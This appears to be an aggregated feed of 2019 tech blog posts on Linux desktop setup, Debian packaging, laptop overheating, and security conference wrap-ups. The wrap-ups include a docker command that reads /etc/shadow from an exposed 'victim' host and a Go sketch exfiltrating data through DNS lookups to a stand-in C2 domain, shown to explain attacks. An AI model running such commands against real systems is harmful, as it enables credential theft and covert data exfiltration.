I've been using this organization for a few months now and I'm astounded by its efficiency. I no longer search for files, I always have what I need at hand, and files no longer pile up in my HOME.

My HOME. Plain and simple.

Software

I've insisted on my desire for simplification. As I was looking to move to a tiling window manager, to do everything with the keyboard and no longer have a desktop, I stumbled upon Regolith Linux, a project that is exactly what I needed: a version of Ubuntu where the GNOME desktop has been replaced by i3, while keeping some of GNOME's advantages and remaining very accessible to beginners thanks to an easy display of the keyboard shortcuts. Bliss!

Apart from the traditional Firefox, Geary (for email) and Feedreader (for RSS), the only significant piece of software installed on my machine is Zettlr.

Zettlr, combined with my directory organization, has managed to replace no fewer than 4 macOS applications. The fact that all the directories of my HOME are in Zettlr is essential. Everything suddenly seems incredibly easy and simple.

Zettlr first of all replaces Ulysses as my software for writing and organizing my texts. It also replaces Evernote as note-taking software. Incidentally, I never managed to find a satisfying workflow between Evernote and Ulysses. But it also replaces DayOne: I decided to turn my personal journal into plain Markdown files (see my DayOne-to-Markdown export script). And, last but not least, it replaces Things, the latest todo manager I had been testing.

Indeed, rather than keeping todos in a separate application, I now simply write the magic word “TODO” in the file of the project concerned. Okay, I admit, I also use a paper notebook (but then, I used to juggle several paper notebooks, my todo manager and my Evernote notes anyway).

Zettlr doesn't perfectly replace any of these applications. But, in a spirit of minimalism, I decided to accept this “degradation”, to lose some features. After more than a month at this pace, I realize that it is extremely liberating for the mind. I was chasing the ultimate solution when, fundamentally, the mental cost of any solution is far higher than its potential benefit.

All this even motivated me to get back into Vim, thanks to Vincent Jousse's book “Vim pour les humains”. I'm trying to see whether I could replicate in Vim the features of Zettlr: navigation by project, distraction-free mode, simple creation of a file within a project. I'm also thinking about moving my email and RSS feeds to the command line, to use Vim shortcuts. Work in progress, notably in terms of the readability of my terminal.

The return home

After 5 years on MacOS, my return to Ubuntu feels like a genuine homecoming. I was never at home on a Mac. I need my tools to be aligned with my values. I belong to the free-software family; it is part of my identity and I have to accept it. I betrayed my ideals out of semi-professional obligation, comfort and curiosity, but I realize that it doesn't suit me.

I think back to all those tools, sometimes excellent, that were created and became a startup before disappearing. Instead of creating my own startup, I created, with my friend Bertrand, the free software Getting Things GNOME. I devoted several years of my life to it, which translated into a certain critical success. Unlike with a startup, I never made the slightest financial profit from it but, today, I'm proud to see that the software still has users who are trying to revive it. That's the whole difference between proprietary and free software: free software has a chance of outliving its founders. But the founders have no chance of making big profits from it.

Today, what I'm looking for in free software is above all freedom and simplification. A simplification that Ubuntu, in my eyes, is straying far too much from, notably with its Snap system, which reminds me too much of the App Store. I'm eyeing a return to my first free-software love, Debian.

While waiting for Regolith to work on Debian, I'm keeping a list of everything I've installed that is not available in Debian. My goal is to keep this list as short as possible. I'm sharing it with you.

Free software, which could therefore end up in Debian: Regolith, Zettlr, starlabs-power (battery optimization for my laptop), Signal, Protonvpn-cli, Bitwarden and f.lux (Redshift didn't really satisfy me). If you know a Debian developer, I'd be happy to lend a hand to get Zettlr into the universal OS!

Non-free: Tresorit, Protonmail-bridge, Antidote, Minetime (no way to find a decent free calendar), Dropbox, Remarkable.

As for non-free services, I also use Adguard (as a Firefox extension) and Brain.fm (I love this service, which simplifies my life to the point of not having to choose which music to listen to while concentrating).

It's both a lot and not much, considering all the services I have cancelled over the past few months.

The little problems

Admittedly, there's still quite a bit left to do to configure my laptop just right. But I believe that's the essence of being a free-software user: it will never be completely finished. In fact, it's a pleasure to get my hands dirty rather than testing yet another proprietary application.

Beware, sensitive souls should stop reading here, because a libre geek's definition of pleasure is particularly twisted.

On my to-do list I have notably put: getting file search from Rofi, polishing my Zsh config, setting up a Notmuch mail config compatible with Mutt and Astroid, finding a command-line calendar, trying a vimification of the browser (something like Tridactyl, but I need to be able to bépo-ify all that), managing to disable the screensaver when the laptop is plugged in (particularly annoying when I'm teaching), and getting autokey (or any equivalent solution) to work. Also: managing to list the TODOs across my various files, for example with a Vim plugin, or with the small sketch below.
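
(In the meantime, a one-liner gets close; a minimal sketch, assuming the directory layout described above:)

grep -rn 'TODO' ~/Focusbox ~/Workbox ~/Frigobox   # list pending TODOs per project file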

If you're not a somewhat hardcore Linux geek, the previous paragraph must read like pure gibberish to you. That's normal; it's a sign that I'm back in my natural element!

15 years ago, I started this blog with the aim of converting Windows users to Linux; I abandoned Debian and Fvwm for Ubuntu and GNOME in order to put myself in the shoes of an ordinary user. Maybe today I can become myself again. And too bad if nobody else manages to use my laptop.

It's in Bépo anyway…

Photo by Patrick Fore on Unsplash

I'm @ploum, a speaker and electronic writer. If you enjoyed this text, feel free to support me on Tipeee, Patreon, Paypal, Liberapay or in millibitcoins 34pp7LupBF7rkz797ovgBTbqcLevuze7LF. Your regular support, even symbolic, is a real motivation and recognition. Thank you!

This text is published under the CC-By BE license.

October 31, 2019

This month was the “Cyber Security Month” and I had the idea to post a security tip on Twitter for the first day. Don’t ask me why. Then, I wrote a second one and decided to tweet something every day. We are now at the end of the month and I’m publishing a recap of all the tweets…

  1. Cybersecurity should not be taken into account only during the Cyber Security Month…
  2. Wielding the Gartner #MagicQuadrant as a shield will not make you bullet-proof!
  3. To have a backup procedure in place is nice, but do you have a “restore” procedure?
  4. The efficiency of your #SIEM is not directly proportional to the number of indexed events!
  5. Restoring your last backup is not efficient when you face a data leak
  6. Afraid of seeing well-trained people resign? What about those who don’t get training and stay on board?
  7. In meetings, do not always trust the person wearing a tie, the bearded man with a black t-shirt has for sure an interesting point of view!
  8. Choosing a #MSSP is not only subscribing to a bronze, silver or gold plan. Do they know your business and your crown jewels?
  9. A backdoor in your security device is not an OOB access solution.
  10. If you care about being port-scanned, you are focusing on wrong threats!
  11. Today, many software updates are still delivered over HTTP. Do NOT upgrade while connected to wild networks like #BruCON^Wsecurity conference!
  12. Thinking that you aren’t a juicy target for bad guys is wrong. You could be (ab)used to reach their final target!
  13. The goal of a pentest scope is not to prevent known-vulnerable servers or apps to be tested!
  14. If your organization faced the same incident multiple times, you probably have to optimize your incident management process.
  15. Many security incidents occur due to the lack of proper solutions for users to work efficiently.
  16. You don’t include #IPv6 in your security controls because you don’t use it? Wrong, you DO already!
  17. ML, AI, Agile, … Nice buzzwords but stick to basic security controls first!
  18. How can you protect yourself if you don’t know your infrastructure?
  19. Don’t hide behind your ISO certification!
  20. The best security solution is the one that fulfills all your requirements (features, $$, knowledge, integration). Don’t keep security $VENDORS promises as is, challenge them!
  21. No incident reported by your SOC for a while… Sounds good or bad? Improve your use cases constantly.
  22. Send your team members to infosec conferences, they will learn a lot and come back with plenty of ideas.
  23. Computers aren’t anymore a box with a screen, keyboard and mouse. Today most devices are connected computers with an OS, I/O, memory, storage and… vulnerabilities!
  24. Today, Infosec plays at layer 8. We have all tools and controls but most of the time we need to compose with political/business/legal aspects to deploy them.
  25. The Supply Chain does not stop once devices have been received. Decommissioning is also an important step to prevent information leak.
  26. Most of your security tools have plenty of unused/hidden features, learn them to improve their efficiency! #RTFM
  27. Docker containers’ purpose is not vulnerability containment.
  28. Assigning less budget to security in the hope to detect fewer incidents is a bad idea!
  29. Keep an eye on your Internet footprint. OSINT is used by attackers too.
  30. Don’t be afraid to look like the boring guy to your colleagues. One day, they’ll thank you!
  31. Take a deep breath and re-read all tips on this blog.

[The post Cyber Security Month Wrap-Up has been first published on /dev/random]

October 30, 2019

I published the following diary on isc.sans.edu: “Keep an Eye on Remote Access to Mailboxes“:

BEC or “Business Email Compromise” has been a trending threat for a while. The idea is simple: a corporate mailbox (usually from a C-level member) is compromised to send legitimate-looking emails to other employees or partners. That’s the very first step of a fraud that could have huge impacts.

This morning, while drinking some coffee and reviewing my logs, I detected a peak of rejected authentications against my mail server. There was a peak of attempts but also, amongst the classic usernames, bots tested some interesting alternatives. If the username is “firstname”, I saw attempts to log in with… [Read more]

[The post [SANS ISC] Keep an Eye on Remote Access to Mailboxes has been first published on /dev/random]

October 29, 2019

A while ago, Debian's technical committee considered a request to figure out what a package should do if a service that is provided by that package does not restart properly on upgrade.

Traditional behavior in Debian has been to restart a service on upgrade, and to cause postinst (and, thus, the packaging system) to break if the daemon start fails. This has obvious disadvantages; when package installation is not initiated by a person running apt-get upgrade in a terminal, failure to restart a service may cause unexpected downtime, and that is not something you want to see.

At the same time, when the upgrade is run interactively from the command line, having the packaging system fail is a pretty good indicator that something is wrong; it tells the system administrator about the problem soon after it was created, which is helpful for diagnosing and possibly fixing it.

Eventually, the bug was closed with the TC declining to take a decision (for good reasons; see the bug report for details), but one takeaway for me was that the current interface on Debian for telling the system whether or not to restart a service upon package installation or upgrade, known as policy-rc.d, is flawed, and has several issues (a minimal sketch of the interface follows the list below):

  1. The interface is too powerful; it requires an executable, which will probably be written in a Turing-complete language, when all most people want is to change the standard configuration for pretty much every init script.
  2. The interface is undetectable. That is, for someone who has never heard of it, it is actually very difficult to discover that it exists, since the default state ("allow everything") of the interface is defined by "there is no file on the filesystem that points to it".
  3. Although the design document states that policy-rc.d scripts MUST (in the RFC sense of that word) be installed through the alternatives system, in practice most cases where a policy-rc.d script is used do not do this. Since only one policy-rc.d can exist at any one time, the result is that one policy script gets overwritten by the other, or that the cleanup routine of one policy script in fact cleans up the other. This has caused at least one Debian derivative to end up in a state where they thought they were installing a policy-rc.d script when in fact they were not.
  4. In some cases, it might be useful to have partial policies installed through various packages that cooperate. Given point 3, this is currently not possible.
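
For reference, here is what the interface looks like in practice: a minimal sketch of a policy-rc.d that denies every service start or restart (returning 101 is the documented "action forbidden" answer):

cat > /usr/sbin/policy-rc.d <<'EOF'
#!/bin/sh
# Deny all service starts/stops requested by maintainer scripts.
exit 101
EOF
chmod 755 /usr/sbin/policy-rc.d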

Because I believe the current situation leaves room for improvement, by way of experiment I wrote up a proof-of-concept script called policy-rc.d-declarative, whose intent it is to use the current framework to provide a declarative interface to replace policy-rc.d with. I uploaded it to experimental back in March (because the buster release was too close at the time for me to feel comfortable to upload it to unstable still), but I have just uploaded a new version to unstable.

This is currently still an experiment, and I might decide in the end that it's a bad idea; but I do think that most things are an improvement over a plain policy-rc.d interface, so let's see how this goes.

Comments are (most certainly) welcome.

I published the following diary on isc.sans.edu: “Generating PCAP Files from YAML“:

The PCAP file format is everywhere. Many applications generate PCAP files based on information collected on the network. Then, they can be used as evidence, as another data source for investigations and much more. There exist plenty of tools to work with PCAP files. Common operations are to anonymize captured traffic and replay it against another tool for testing purposes (demos, lab, PoC)… [Read more]

[The post [SANS ISC] Generating PCAP Files from YAML has been first published on /dev/random]

October 28, 2019

It's usually a good thing to receive a newer laptop, as that usually means shiny new hardware, better performance and also better battery life. I was really pleased with my previous Lenovo Thinkpad t460s, so the normal choice was its successor (also because it's the default model following company standard): the t490s.

When I received the laptop, I was a little bit surprised (I had no real time to review/analyze it in advance) by some choices:

  • No SD card reader anymore (useful when having to "dd" some image for armhfp tests)
  • Old docking style is gone and you have to connect through usb-c/thunderbolt
  • Embedded gigabit ethernet in the t490s (Intel Corporation Ethernet Connection (6) I219-LM (rev 30)) isn't used at all when docked, but going through usb-net device

Installing CentOS Stream (so running kernel 4.18.0-147.6.el8.x86_64 when writing this post) was a breeze, after I turned on SecureBoot (useful because you can then also use fwupd to get LVFS firmware updates automagically, as I did for my t460s).
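
For the curious, the fwupd side boils down to something like this (a sketch, assuming the vendor publishes its firmware on LVFS):

fwupdmgr refresh       # fetch current firmware metadata from LVFS
fwupdmgr get-updates   # list devices with pending firmware updates
fwupdmgr update        # apply them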

But I quickly realized a huge difference between my previous t460s and the new t490s: heat/temperature, and thus fan usage. To the point where it was really impossible to even use our official video-conferencing solution: fan going crazy, laptop unresponsive (load average climbing to ~16), and video/sound completely "off-sync".

Dmesg was also full of warnings like these:

[248849.131909] CPU1: Core temperature/speed normal
[248894.211874] CPU1: Package temperature above threshold, cpu clock throttled (total events = 1221232)
[248894.211897] CPU5: Package temperature above threshold, cpu clock throttled (total events = 1221232)
[248894.211902] CPU3: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211903] CPU0: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211903] CPU6: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211904] CPU4: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211905] CPU2: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.211905] CPU7: Package temperature above threshold, cpu clock throttled (total events = 1221233)
[248894.212895] CPU1: Package temperature/speed normal
[248894.212895] CPU5: Package temperature/speed normal
[248894.212908] CPU4: Package temperature/speed normal

After some quick research, I found some links about known issues on some (recent) Lenovo thinkpads and some possible solutions explaining the issue[s]:

Nice, or not so nice (I'm still waiting for Lenovo to fix this through a firmware update for the t490s at the time of writing this blog post). I quickly rebuilt a community-proposed fix, and the rpm is available in my Copr repository.

But, as stated on said GitHub repo, it doesn't work with SecureBoot, so I temporarily disabled SecureBoot to test said fix. It wasn't magical either, so I decided to re-enable SecureBoot and go back to "normal" mode.

Then I found another interesting forum thread about t480 and fan/heat issue, so I decided to have a look.

Indeed: 'Thunderbolt BIOS Assist Mode' was disabled in my case too (I wonder why it shipped disabled, given that the laptop came with RHEL8 installed and pre-loaded). Let's enable it and see how that goes:

T490s settings

OMG! Instead of keeping a terminal open with "watch sensors" running, I wanted to have a quick look directly from GNOME, so I just installed the gnome-shell-extension-system-monitor-applet (available now in epel8-testing), and so far so good:

When running a normal workload (while connected to the dock and two external displays), it runs like this:

temperature

And yesterday I was happy (the ultimate test) to be in a video conf-call for more than one hour, with no video/sound issues; the temperature just climbed a little bit, but nothing unusual when using such a video call:

temperature

Hope it helps, not only if you run Linux on a t490s, but also on any recent Lenovo Thinkpad (or even Yoga, it seems) model. Now I'm still waiting on Lenovo to release firmware fixing the throttling issue, but at least the laptop is currently usable :)

October 26, 2019

I’m happy to announce a brand new blog dedicated to MediaWiki and all things enterprise wiki related.

Half a year ago I launched Professional Wiki together with Karsten Hoffmeyer. Professional Wiki is, as the name suggests, a company providing professional wiki services. We help companies create and manage wikis, we provide training and support and we offer fully managed wiki hosting.

Today we published our new blog featuring a first post on installing MediaWiki extensions with Composer. This blog will contain both wiki news and longer lived articles, such as the one about Composer.
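
The short version, as a hedged example (Semantic MediaWiki is just one extension distributed this way; run from the MediaWiki installation directory, then finish with the maintenance update script):

composer require mediawiki/semantic-media-wiki
php maintenance/update.php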

In recent years I was hesitant to post MediaWiki-specific content on this blog (Entropy Wins) because it had evolved to focus on software design. The new Professional Wiki blog solves this problem, so you can expect more MediaWiki-related posts from me again.

The post New MediaWiki blog appeared first on Entropy Wins.

October 25, 2019

After the MISP Summit on Monday and hack.lu, here is a quick review of the third event I'm attending in my crazy week in Luxembourg: BSides Luxembourg! It was already the 3rd edition (and the 2nd for me). The message is clear: this event focuses on the "blue team" side; don't expect offensive content like 0-days. I did not attend all the talks because there were two tracks and I spent some time chatting with friends.

The first talk I attended was “Threat Hunting Linux & Mac using Elastic Auditbeat” by Aaron Jewitt. The talk covered the endpoint problem when endpoints run Linux or macOS. I tweeted a few days ago that network monitoring is key to detecting suspicious activity on a network, but the main issue today for defenders is encryption: most of the traffic is encrypted and DoH will become more and more popular, so we need different solutions (a connection to Amazon over port 443 carries no context). The solution is endpoint visibility. Windows has Sysmon and event logs, but what about UNIX-flavored OS's? Auditbeat to the rescue! It's a lightweight shipper to audit the activities of users and processes, with three modules: auditd receives events from the Linux audit framework; the file integrity module generates events when files/folders are changed (events contain file metadata and hashes); and the system module collects information about a system from six different datasets, including Host, Login, Package, Process (the most useful for threat hunting) and User. It's like a Sysmon for Linux & Mac. How to use Auditbeat? The configuration is made via a YAML file: configure the modules to be used (each module has its specific config) and set the logging output. Threat hunting is a never-ending process: you assume that you've been breached, but you don't know how, where or when. What about macOS? Apple is shy and doesn't let you see what's happening (see objective-see.com). Examples of hunting on a Mac: for persistence via kernel extensions (kexts), watch for ‘kextload’ process executions; look at /var/at/tabs/; watch the “defaults” command (used to read and change default settings, e.g. “defaults read”); remember that /private/etc is like /etc on Linux (bashrc, man.conf); monitor Sudo activity; and monitor for strange parent/child processes (like on Windows). And on Linux? Processes touching /dev/tcp/*, PHP with fsockopen, the good old “|bash” 🙂 Conclusions: endpoint visibility can empower defenders; keep an eye on Linux/macOS. This really adds value on top of network monitoring.
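
A few of the macOS hunting spots mentioned above translate into quick commands like these (a sketch; run them with appropriate privileges):

kextstat | grep -v com.apple   # list non-Apple kernel extensions (persistence via kexts)
ls -la /var/at/tabs/           # at(1) job files, another persistence spot
defaults read                  # dump the current user's defaults
ls -la /private/etc            # the macOS equivalent of /etc (bashrc, man.conf, ...)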

Just after this presentation, I switched to the other track to follow “Security Trade-offs in ElasticSearch” by Philipp Krenn. He explained some security facts about ElasticSearch.

“How to Shield an IoT product from the OWASP IoT Top-10” by Pablo Endres. After a brief recap about IoT, he switched to the dark side: the security of IoT devices. Huge topic! IoT is, by design, pretty complex: you have a mix of hardware, software, firmware, communication protocols, gateways (sometimes), network, data collection, and applications. Everybody remembers the joke: the “S” in IoT stands for “Security”. After reviewing different aspects of the (in)security of IoT devices, Pablo reviewed the OWASP IoT project and the top-10 vulnerabilities.

The next talk was really interesting because I'm also working on the same kind of project: “Automated Attack Surface Detection and Information Gathering” by Thorsten Ries. He described his project: automatically scanning and enriching the IP addresses used by his organization. Indeed, when you have many public IP addresses, it's important to keep an eye on the services they expose (by mistake, or because a new vulnerability has been released for a specific application; for example, the famous RDP vulnerability). The idea is the following:

Scan > Enrich > Report > Mitigate

Thorsten explained how he performs these tasks and which components are interconnected (Shodan, Spiderfoot, etc.). Interesting.
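
As a rough sketch of the "Scan > Enrich" steps with off-the-shelf tools (the addresses are placeholders, and whether Thorsten's pipeline uses these exact invocations is an assumption; shodan here is the CLI shipped with the official Python package):

nmap -sV -oX scan.xml 203.0.113.0/24   # discover exposed services on your ranges
shodan host 203.0.113.10               # enrich a single IP with Shodan's external view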

After the lunch break, it was my turn and I presented “A Walk Through Logs Hell“. This was a brand new talk that covered a series of mistakes that you could face with your log management solution. I got some pertinent questions during the Q&A.

Then, James Nemetz reviewed the Equifax breach with “(Identify)|Protect|Detect|Respond – A Deep Dive into a High Visibility 2017 Breach“. I like this kind of review because you learn from the mistakes of others and realize that the same could happen in your own environments. To summarize: it was a complete failure.

After the afternoon coffee break, Daan Raman presented the framework developed by NVISO, a Belgian security consultancy company. The framework performs statistical outlier detection. The idea is not to detect malicious activity using common signatures (this can be performed by many other tools) but to spot known-bad events that are difficult to detect via such rules. This is based on the generation of statistical models (which must be automated). The result is ee-outliers, an open-source framework developed to detect statistical outliers in events stored in Elasticsearch. The framework is available here.

Last but not least, Peter Czanik presented “What you most likely did not know about Sudo…”. The last time I met Peter, I was speaking at the same time as him. This time I was finally able to attend his talk about the magic command, and I was not disappointed! I've been using Sudo for 15+ years and I still learned new stuff. What is Sudo? This picture sums it all up:

For many people, Sudo configuration remains simple and looks like this:

%wheel ALL=(ALL) ALL

You can read this as: who, where, as which user, which commands can be executed. But there are many other features that can be activated. First example: digest verification. If the binary allowed to a user is modified, Sudo will prevent its execution. Second example: session recording. You can record a Sudo session and play it back later. Small security issue: sessions are recorded locally and can easily be destroyed. In fact, the latest release of Sudo has a modular plugin architecture and features can be added (as shared libraries or directly in the code). An interesting plugin is an approval system that allows another admin to review the command that will be executed via Sudo and to allow/reject it. You can see this as a “dual-control system”. The plugin is called sudo_pair. Then Peter explained how to integrate Sudo with syslog-ng for better logging and reporting. Finally, he explained what's in the pipe for future releases. Great job!
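
For illustration, here is a minimal sudoers sketch of those two features; the digest value is a hypothetical placeholder, and option availability depends on your Sudo version:

# Digest verification: alice may only run /usr/bin/id if its SHA-224 digest matches
alice ALL = sha224:0123456789abcdef0123456789abcdef0123456789abcdef01234567 /usr/bin/id

# Session recording: log the output of all Sudo sessions (replay with sudoreplay)
Defaults log_output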

That’s over! My week in Luxembourg is complete; I'm driving back to Belgium. See you soon for other wrap-ups!

[The post BSides Luxembourg 2019 Wrap-Up has been first published on /dev/random]

October 24, 2019

And here is my third and last wrap-up for the 2019 edition of hack.lu!

The last day is always harder for many people after the social event but I was on time to follow the first talk: “Beyond Windows Forensics with Built-in Microsoft Tooling” by Thomas Fischer. Thomas’s goal was to give some “ideas” to people who attended the talk to implement new things when back at work.

Thomas on Stage

Shadow IT is a problem because, when you have to investigate an incident on a device that you don't own, you don't have all the tools you'd have on a corporate computer. How to quickly investigate without messing everything up? Most of the time, those devices run Windows. Good news: PowerShell has been available everywhere since Windows 7. It supports regexes and uses objects for data. You can instruct PowerShell to fetch a script via HTTP and execute it in memory (thanks to “IEX”). You can access files, the registry and event logs, and there are a lot of scripts available online. We have the foundations. Then Thomas presented “SRUM”, the “System Resource Usage Monitor”. It's a Windows component, available since Windows 8, that collects process and network-related metrics over time (since the machine booted!). Application History (from the task manager) is also a good source of data: all started processes (even if removed from the system) are logged. The rest of the talk was a suite of demos based on PowerShell scripts used to pull data from the SRUM database. I think that SRUM + scripts deserve to be presented in a workshop format to give people a chance to try it. Thomas's scripts are available here.

Then, we switched to the APT world with “Effectiveness in simplicity: The Taskmasters APT” presented by Elmar Nabigaev. The APT group covered is called “TaskMasters” and uses very simple TTPs! Discovered in 2010, they focus on espionage and have a big toolbox. What about their victims? Military contractors, governments, telecoms but also small businesses. Their kill chain is: initial vector unknown (probably phishing emails) > escalation (EternalBlue, stolen creds) > lateral movement (scanning, tunneling, scheduled tasks, RDP) > exfiltration. Elmar reviewed the malware behind the attack: Remshell. What about the toolbox they used? It is based on public tools (Microsoft SysInternals, scanners, webshells, WinRAR) as well as private tools (fcopy, 404-Webshell, EternalBlueExploiter). Some tools were reviewed, but also some mistakes the attackers made. More details about this research are available here.

After the morning coffee break, we switched to the wonderful world of containers with “Who contains the containers” presented by Ioana Andrada and Emilien Le Jamtel. Given the big success of container technologies, this is a hot topic. First, how easy is it to compromise containers? The presentation focused on Docker. Many containers are deployed in the wild, often without real security considerations. About images: what's the source? Can we trust it? Is it securely built? Does it leak interesting secrets? Is it up to date? What privileges are required? (Here is an interesting link about container hardening.) Many Docker daemons expose their API port in the wild (TCP/2375-2376): use TLS and enable a debugging log level for API calls. Kubernetes (the orchestration tool) must also be properly secured. Kubernetes uses “objects”: pod, service, volume, namespace. It also has many APIs you should not expose:

APIs You Should not Expose

The next part, presented by Emilien, was about attacks against containers. CVE-2019-5736 is the best known (it affects “runc”), but there is also CVE-2018-8115 (Docker for Windows). Why would you expose Docker APIs on the Internet!?

Abusing API

Emilien explained how easy it is to find publicly accessible Docker instances and how you can start a container from the API with a folder mounted from the host. Docker runs as root by default. Just start an Ubuntu image, mount /etc as /tmp and “cat /tmp/shadow”, booooom! Finally, some interesting cases based on scanning for exposed infrastructure: xmrig miners are the most common use made of compromised containers. If you play with Docker containers, here is an interesting tool mentioned: dive. It was my favorite talk of the day!
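
A minimal sketch of the attack described above, assuming a daemon whose API is reachable unauthenticated on TCP/2375 (the host name is a placeholder):

docker -H tcp://victim.example.com:2375 run --rm -v /etc:/tmp ubuntu cat /tmp/shadow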

I skipped the next talk: “spispy: opensource SPI flash emulation” by Trammel Hudson.

After the lunch break, the afternoon started with “Piercing the Veil: Server Side Request Forgery attacks on Internal Networks” by Alissa Herrera. It was about successful attacks using SSRF (“Server Side Request Forgery”). In short, it's an attack that maliciously makes a server perform a request/lookup on the attacker's behalf, which can lead to attacks against the Intranet. It's not a new attack; it was described for the first time in Phrack! Alissa reviewed different ways to exploit this vulnerability, as well as some of her findings while having a look at .mil servers.

Next one: “Defeating Bluetooth Low Energy 5 PRNG for fun and jamming” by Damien Cauquil. Damien already gave this talk at BruCON a few weeks ago, but this time I was able to follow it.

Damien on Stage

Damien explained in detail what's new in version 5.0 of BTLE. Security mechanisms are pairing, secure connections, and the channel selection algorithm. The known attacks (for BTLE <4.2) are sniffing, jamming and hijacking. What did BTLE 5 introduce? Better throughput, better range, and improved coexistence. The new channel selection algorithm is PRNG-based and more “random” than the previous one. In the next part of his presentation, Damien explained that the PRNG is “not really a PRNG”: it was designed to improve coexistence, not security. For BTLE 5, Damien updated his testing framework, btlejack.

We needed a good refill of caffeine before the last set of talks. First, “DOS Software Security: Is there Anyone Left to Patch a 25-year old Vulnerability?” by Alexandre Bartel. When I read “DOS” in the abstract, I thought “denial of service”, but Alexandre spoke about the “Disk Operating System”; yes, you read that right, the good old operating system. DOS does not mean “Dead Operating System”. It started in 1966 with DOS/360, then Atari DOS and many other different flavors like MS-DOS and FreeDOS (in 1998). But it is still alive! Example: McLaren used it on laptops to interconnect with their F1 cars (via a bespoke CA card). Today, you can still use it via DOSBox, a DOS emulator. Alexandre started to fuzz DOS to find vulnerabilities and found an interesting buffer overflow. It's crazy to see how game development companies still rely on DOSBox, and games use the same engine (e.g., Shadow Warrior). The next idea was: what if we could access the local filesystem of the host running DOSBox? Better: what if we could access the memory and exploit the host? Challenge completed: Alexandre demonstrated a DOSBox that spawns a calculator on the underlying Linux host!

Popping a calculator via DOSBox

Last but not least, “DNS On Fire” was presented by Paul Rascagneres & Warren Mercer. After a brief recap of how DNS works, they explained what a DNS redirect attack is (with many examples). This research started while analyzing a malware sample. Communication with the C2 was performed through HTTP requests or… DNS!

Paul & Warren on Stage

DNSpionage uses interesting techniques to communicate over DNS. A DNS request to the C2 returns a fake IP address that, once decoded, gives the command to be executed (ok, the number of commands is limited). Then, the command results are exfiltrated via more DNS requests (in groups of four characters!). In the next part, they presented Sea Turtle. DNS hijacking is a real pain and has been used for a long time. Key takeaway: monitor your DNS records for any suspicious change, and also watch the Certificate Transparency project for any SSL certificate generated for your domain(s).
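
To illustrate the exfiltration idea (a generic sketch of the pattern, not DNSpionage’s actual code; “c2-example.net” is a placeholder domain):

package main

// Sketch of DNS exfiltration in small chunks: the data is encoded and leaked
// as subdomain lookups. The attacker-controlled authoritative server logs
// every query; the answer itself doesn't matter.
import (
	"encoding/hex"
	"fmt"
	"net"
)

func exfiltrate(output string) {
	enc := hex.EncodeToString([]byte(output))
	for i := 0; i < len(enc); i += 4 { // groups of four characters per query
		end := i + 4
		if end > len(enc) {
			end = len(enc)
		}
		name := fmt.Sprintf("%s.%d.c2-example.net", enc[i:end], i/4)
		net.LookupHost(name) // fire-and-forget: the query itself carries the data
	}
}

func main() {
	exfiltrate("uid=0(root)")
}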

That was my last wrap-up; the 2019 edition is already over. Tomorrow, let’s follow BSides Luxembourg (I’ll also speak there).

[The post Hack.lu 2019 Day #3 Wrap-Up has been first published on /dev/random]

October 23, 2019

After a short night playing the CTF and a lot of morning coffee, I was ready for the second day…

It started with a hot topic: “Sensor & Logic Attack Surface of Driverless Vehicles” presented by Zoz. Even if not yet common on our roads today, self-driving cars (or cars with many driving aids) exist. The first self-driving car was developed in 1986 in Germany (a car with embedded cameras)! In Europe, there are many ongoing projects: Nissan in the UK, Volvo in Sweden, BMW in Germany. There is also an EU project called AUTOPILOT. The real revolution is coming in many fields: transportation, mapping services, a lot of civil applications. The idea is to prevent humans from making mistakes but… many failures may occur. What’s the logic behind these cars? We have the following architecture: Controls > collision avoidance > navigation & localization > planners/reasoners.

Vehicles are equipped with many sensors: GPS, LIDAR, cameras, wave radars, IMU, compass, doppler, pressure, … Sensors are a source of uncertainty: noise, drift, latency. What kinds of attacks can be performed against those sensors? DoS and spoofing, either instantaneous or based on aggregated data. In the rest of his presentation, Zoz reviewed each sensor’s weaknesses and how to abuse them.

Saad Kadhi presented “Disturbance: on the Sorry State of Cybersecurity and Potential Cures“. In the beginning, there was a first security tool: an anti-virus, born in 1970! It protected us (to some extent), but today AVs are not strong enough to protect us against modern threats like worms, trojans, ransomware and fileless malware, nor against potentially unwanted applications (PUAs) like Mimikatz.

Saad on Stage

Saad referenced a paper about the “Microsoft Monoculture”. Monoculture can be seen as bad, but it has advantages: the security of Microsoft products really improved over time. However, monoculture implies standards and class breaks. If targets are widely deployed, the attack surface increases. Many security tools have been impacted by vulnerabilities, and the same applies to supply chain attacks. What if the same HVAC system is used by many organizations (remember the Target story)? TeamViewer is a good example, reported by Christopher Glyer (APT41). The security product zoo keeps growing, but those products also introduce issues. And all those products run on top of vulnerable processors. All these products need people to install, use and maintain them. But the human brain is not a computer (too much stuff to learn, distractions, burnouts). How to break the failure cycle? The idea of the talk was very nice but, playing the Devil’s advocate here, in many (big) organizations there is no alternative to buying expensive solutions from security vendors…

After a short but welcome coffee break, Mathieu Tarral presented “Leveraging KVM as a debugging platform“. Last year, Mathieu already presented his research about using hypervisors to perform malicious code analysis (r2vmi). This year, he came back with new stuff: VM introspection on KVM. Again, an interesting approach that deserves a look if you are playing with sandboxes and malware analysis.

The next talk was “The Red Square – Mapping the connections inside Russia’s APT ecosystem”, presented by Ari Eitan and Itay Cohen. I liked the approach of the talk: searching for connections between Russian malware samples. The research started by reading a lot of material. Then the following steps were implemented: gathering the samples, classification, finding code similarities, and analyzing the discovered connections. The challenge with classification was, as usual, the lack of a naming convention. To help them in this process, they developed a tool called APT Detector (based on YARA rules).

The next talk was flagged as TLP:AMBER, so no review here. “Fileless Malware Infection and Linux Process Injection in Linux OS” by Hendrik Adrian. Great talk, and thank you for the awesome content that you post regularly!

After lunch, Andreia Gaita presented “Exploiting bug report systems in the game industry”. The targets were not the companies publishing games but the companies making middleware tools used by the gaming industry. Indeed, like CMSs or frameworks, why reinvent the wheel? Many games are based on the same engine. There are many engines, but some, like Unity, are really popular. They are used by major game studios and by millions of people, which makes them very nice targets. A game engine can be seen as a layered stack: Platform > Game Engine runtime > Script layer > Game.

Andreia on Stage

Making a game is like the cinema industry: programming is not the most important part; scenarios and production are. A key concept is “hot reloadable code”: the code is recompiled on the fly while the game is running (Andreia made some demos). She explained how easy it is to attack, sometimes just by submitting a bug report. Once submitted, it is reviewed and escalated to the engine developers and guess what? The development environment is not very safe (ex: many recommendations are made to disable the AV!).

